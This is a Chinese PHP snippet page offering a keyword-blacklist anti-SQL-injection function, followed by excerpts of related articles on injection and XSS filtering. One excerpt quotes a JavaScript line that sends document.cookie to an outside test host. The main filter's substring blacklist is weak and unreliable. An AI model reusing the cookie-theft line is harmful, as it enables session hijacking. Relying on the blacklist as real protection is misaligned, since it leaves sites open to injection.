php通用防注入程序 推荐
function jk1986_checksql()
{
$bad_str = "and|select|update|'|delete|insert|*";
$bad_Array = explode("|",$bad_str);
/** 过滤Get参数 **/
foreach ($bad_Array as $bad_a)
{
foreach ($_GET as $g)
{
if (substr_count(strtolower($g),$bad_a) > 0)
{
echo "<script>alert('诡异字符,请不要尝试注入本站! 作者:Jk1986 QQ:414028660');location.href='index.php';</script>";
exit();
}
}
}
/** 过滤Post参数 **/
foreach ($bad_Array as $bad_a)
{
foreach ($_POST as $p)
{
if (substr_count(strtolower($p),$bad_a) > 0)
{
echo "<script>alert('诡异字符,请不要尝试注入本站! 作者:Jk1986 QQ:414028660');location.href='index.php';</script>";
exit();
}
}
}
/** 过滤Cookies参数 **/
foreach ($bad_Array as $bad_a)
{
foreach ($_COOKIE as $co)
{
if (substr_count(strtolower($co),$bad_a) > 0)
{
echo "<script>alert('诡异字符,请不要尝试注入本站! 作者:Jk1986 QQ:414028660');location.href='index.php';</script>";
exit();
}
}
}
}
呵呵 类似asp和asp.net 思路一样,目的就是让懒来提高效率 .88
相关推荐
-
PHP利用str_replace防注入的方法
PHP各种过滤字符函数 复制代码 代码如下: <?php /** * 安全过滤函数 * * @param $string * @return string */ function safe_replace($string) { $string = str_replace('%20','',$string); $string = str_replace('%27','',$string); $string = str_replace('%
-
PHP和XSS跨站攻击的防范
其实这个话题很早就想说说了,发现国内不少PHP站点都有XSS漏洞.今天偶然看到PHP5的一个XSS漏洞,在此小结一下.顺便提醒,使用PHP5的朋友最好打下补丁,或者升级一下. 如果你不懂什么是XSS,可以看这里,或者这里(中文的也许会好懂一些). 国内不少论坛都存在跨站脚本漏洞,例如这里 有一个Google Hack+XSS的攻击例子,针对的是Discuz 4.0.0RC3.国外也很多这样的例子,甚至Google也出现过,不过在12月初时修正了.跨站攻击很容易就可以构造,而且非常隐蔽,不易被查
-
PHP 防注入函数(格式化数据)
复制代码 代码如下: <? //格式化数据(防止注入) function site_addslashes($string, $force = 0) { !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); if(!MAGIC_QUOTES_GPC || $force) { if(is_array($string)) { foreach($string as $key =&
-
php过滤XSS攻击的函数
下面的函数可以用来过滤用户的输入,保证输入是XSS安全的.具体如何过滤,可以参看函数内部,也有注释. 复制代码 代码如下: <?phpfunction RemoveXSS($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script&g
-
PHP防注入安全代码
简述:/************************* 说明: 判断传递的变量中是否含有非法字符 如$_POST.$_GET 功能:防注入 **************************/ 复制代码 代码如下: <?php //要过滤的非法字符 $ArrFiltrate=array("'",";","union"); //出错后要跳转的url,不填则默认前一页 $StrG
-
PHP中防止SQL注入攻击和XSS攻击的两个简单方法
mysql_real_escape_string() 所以得SQL语句如果有类似这样的写法:"select * from cdr where src =".$userId; 都要改成 $userId=mysql_real_escape_string($userId) 所有有打印的语句如echo,print等 在打印前都要使用htmlentities() 进行过滤,这样可以防止Xss,注意中文要写出htmlentities($name,ENT_NOQUOTES,GB2312) .
-
细谈php中SQL注入攻击与XSS攻击
例如: SQL注入攻击 XSS攻击 复制代码 代码如下: 任意执行代码 文件包含以及CSRF. } 关于SQL攻击有很多文章还有各种防注入脚本,但是都不能解决SQL注入的根本问题 见代码: 复制代码 代码如下: <?php mysql_connect("localhost","root","123456")or die("数据库连接失败!"); mysql_select_db("test1"); $u
-
xss防御之php利用httponly防xss攻击
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了... 如下js获取cookie信息: 复制代码 代码如下: url=document.top.location.href;cookie=document.cookie;c=new Image();c.src='http://www.test.com/c.php?c
-
比较好用的PHP防注入漏洞过滤函数代码
复制代码 代码如下: <?PHP //PHP整站防注入程序,需要在公共文件中require_once本文件 //判断magic_quotes_gpc状态 if (@get_magic_quotes_gpc ()) { $_GET = sec ( $_GET ); $_POST = sec ( $_POST ); $_COOKIE = sec ( $_COOKIE ); $_FILES = sec ( $_FILES ); } $_SERVER = sec ( $_SERVER ); functi
-
php中addslashes函数与sql防注入
本文实例讲述了php中addslashes函数与sql防注入.分享给大家供大家参考.具体分析如下: addslashes可会自动给单引号,双引号增加\\\\\\,这样我们就可以安全的把数据存入数据库中而不黑客利用,参数'a..z'界定所有大小写字母均被转义,代码如下: 复制代码 代码如下: echo addcslashes('foo[ ]','a..z'); //输出:foo[ ] $str="is your name o'reilly?"; //定义字符串,其中包括需要转义的字符 e
-
整理php防注入和XSS攻击通用过滤
对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全. 那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips 1. 假定所有的用户输入数据都是"邪恶"的 2. 弱类型的脚本语言必须保证类型和期望的一致 3.
-
通俗易懂的php防注入代码
介绍两种方法吧,首先请把以下代码保存为safe.php放在网站根目录下,然后在每个php文件前加include("/safe.php");即可 : php防注入代码方法一: 复制代码 代码如下: <?php //要过滤的非法字符 $ArrFiltrate=array("'",";","union"); //出错后要跳转的url,不填则默认前一页 $StrGoUrl=""; //是否存在数组中的值 fu
-
php SQL防注入代码集合
SQL防注入代码一 复制代码 代码如下: <?php /** * 防sql注入 * @author: zhuyubing@gmail.com * */ /** * reject sql inject */ if (!function_exists (quote)) { function quote($var) { if (strlen($var)) { $var=!get_magic_quotes_gpc() ? $var : stripslashes($var); $var = str_rep
随机推荐
- Jsp生成页面验证码的方法[附代码]
- IRC后门病毒及手动清除方法
- 详解SpringMVC学习系列之国际化
- iOS发送短信功能的实现代码
- Python编程中运用闭包时所需要注意的一些地方
- FreeTextBox(版本3.1.6)在ASP.Net 2.0中使用方法
- iOS中模态Model视图跳转和Push视图跳转的需求实现方法
- python中将函数赋值给变量时需要注意的一些问题
- Python守护进程和脚本单例运行详解
- C#中label内容显示不全、不完整的解决方法
- mysql SKIP-NAME-RESOLVE 错误的使用时机造成用户权限
- jQuery获取URL请求参数的方法
- jQuery实现点击图片翻页展示效果的方法
- 复制网页内容,粘贴之后自动加上网址的实现方法(脚本之家特别整理)
- php中FTP函数ftp_connect、ftp_login与ftp_chmod用法
- Apache下禁止特定目录执行PHP 提高服务器安全性
- java中成员变量与局部变量区别分析
- Spring+SpringMVC+MyBatis整合详细教程(SSM)
- Java简单实现农夫过河问题示例
- python得到一个excel的全部sheet标签值方法